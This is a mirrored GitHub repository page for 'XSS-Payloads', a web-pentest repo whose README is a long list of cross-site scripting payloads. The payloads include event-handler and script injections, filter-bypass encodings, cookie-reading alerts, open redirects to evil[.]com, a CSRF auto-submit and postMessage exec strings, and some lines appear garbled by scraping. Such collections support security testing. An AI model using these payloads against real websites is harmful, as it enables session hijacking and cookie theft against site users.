https://github.com/mustafa-kum/xss-payloads
Xss-Payloads
https://github.com/mustafa-kum/xss-payloads
web-pentest xss xss-vulnerability
Last synced: 3 months ago
JSON representation
Xss-Payloads
- Host: GitHub
- URL: https://github.com/mustafa-kum/xss-payloads
- Owner: Mustafa-Kum
- Created: 2023-01-06T11:32:02.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2023-01-11T11:44:18.000Z (over 2 years ago)
- Last Synced: 2025-01-25T22:23:16.820Z (4 months ago)
- Topics: web-pentest, xss, xss-vulnerability
- Homepage: https://github.com/Mustafa-Kum/XSS-Payloads
- Size: 9.77 KB
- Stars: 2
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# XSS-Payloads
```javascript
Inner XSS
document.getElementsByTag('body')[0].innerHTML = `![]()
`
![]()
![]()
![]()
![]()
target[.]com/?redirect_to=evil[.]com
JavaScript XSS
");alert('xss');
')alert('xss');
javas%09cript:alert(1)
" onmouseover="alert(document['cookie'])">
" onfocus="alert(document['cookie'])" autofocus">
';alert(1);'
var token='';alert(1);''
alert(1);
var token=alert(1);';
>alert(1);
">
test
'+alert(1)+'
"onmouseover="alert(1)
http://"onmouseover="alert(1)
%09onmousover=alert(1)
%3f%09onmousover=alert(1)
%3f%09onmousover=alert(document.location.hash.substring(1))#{XSS} ---> Console ---> document.location.hash
asd";}catch(e){}alert(document.cookie);try{XSS="
lookhere’);});
Target[.]com/?s=”>alert(1)&s=”>alert(1)
'"> {{1*1}}
/?utm_source=%60%2balert/**/(1)%2b%60
/?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3ealert('XSS')<\/script>
aaa"bbb'ccc<svg onload=alert('XSS')>eee
<svg onload="alert('XSS on '+ document.domain)">
</title>![]()
">
alert(1);//
"'> </form><script>alert("XSS");
'> alert("XSS");
javascript://%0a%0dalert(document.cookie)
*/alert('XSS\n-XSS'); //
''> alert("XSS");
'">prompt(/XSS/)
'"> prompt(/XSS/)
data:,\u0077indow.top.alert(1)
">ipt>alert(1)
onmouseover=alert'(document.domain)'
/
alert ("XSS");
/OnLoad="`${prompt"}`">
<--`![]()
%20--!>
(_=alert,_(1337)) "">
![]()
';redirecturl='javascript:alert("XSS")
';redirecturl='http://google.com/'
redirect_to=////evil%E3%80%82com
"/>alert("Xss:Priyanshu")
"/>alert(/XSS/)
"
"><%2Fstyle<%2Fscript>confirm("XSS")<%2Fscript>
<body onload=document.getElementById("xsrf").submit()>
<a href="data:text/html;based64_,<svg/onload=\u0061l&101%72t(1)>">X</a
<a href="data:text/html;based64_,<svg/onload=\u0061l&101%72t(document.cookie)>">X</a
http://test.com<script>alert(document.domain)
http://test.comalert(document.cookie)
x">
q=" onclick="alert(/XSS/)
">
">alert(document.cookie)
alert('xss')
/default.aspx#">
/default.aspx#">
by ">
“>.txt.jpg
“>
">
">alert('XSS')
id=abc">alert(/xss/)
">![]()
Default.aspx/" onmouseout="confirm(1)'x="
toString=\u0061lert;window+''
”/><script>alert(1)</script>”/>
\">
Click Here=></iframe>
/error3?msg=30&data=';alert('xss');//
/omni_success?cmdb_edit_path=");alert('xss');//
Console
window.postMessage('alert(document.domain','*')
window.postMessage({"action": "exec", "payload": "alert(document.domain)"}, '*')
{{{alert(1)
javascript:/*-->
![]()
![]()
![]()
![]()
![]()
alert("XSS")"\>
![]()
![]()
![]()
http://example.com/search?q=%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
http://example.com/search?q=alert(%00'XSS')
http://example.com/search?q^alert('XSS')
http://example.com/search?q=%3Cscript%3Ealert(%00'XSS')%3C%2Fscript%3E
https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
https://www.bugcrowd.com/blog/the-ultimate-guide-to-finding-and-escalating-xss-bugs/
">] ">]
```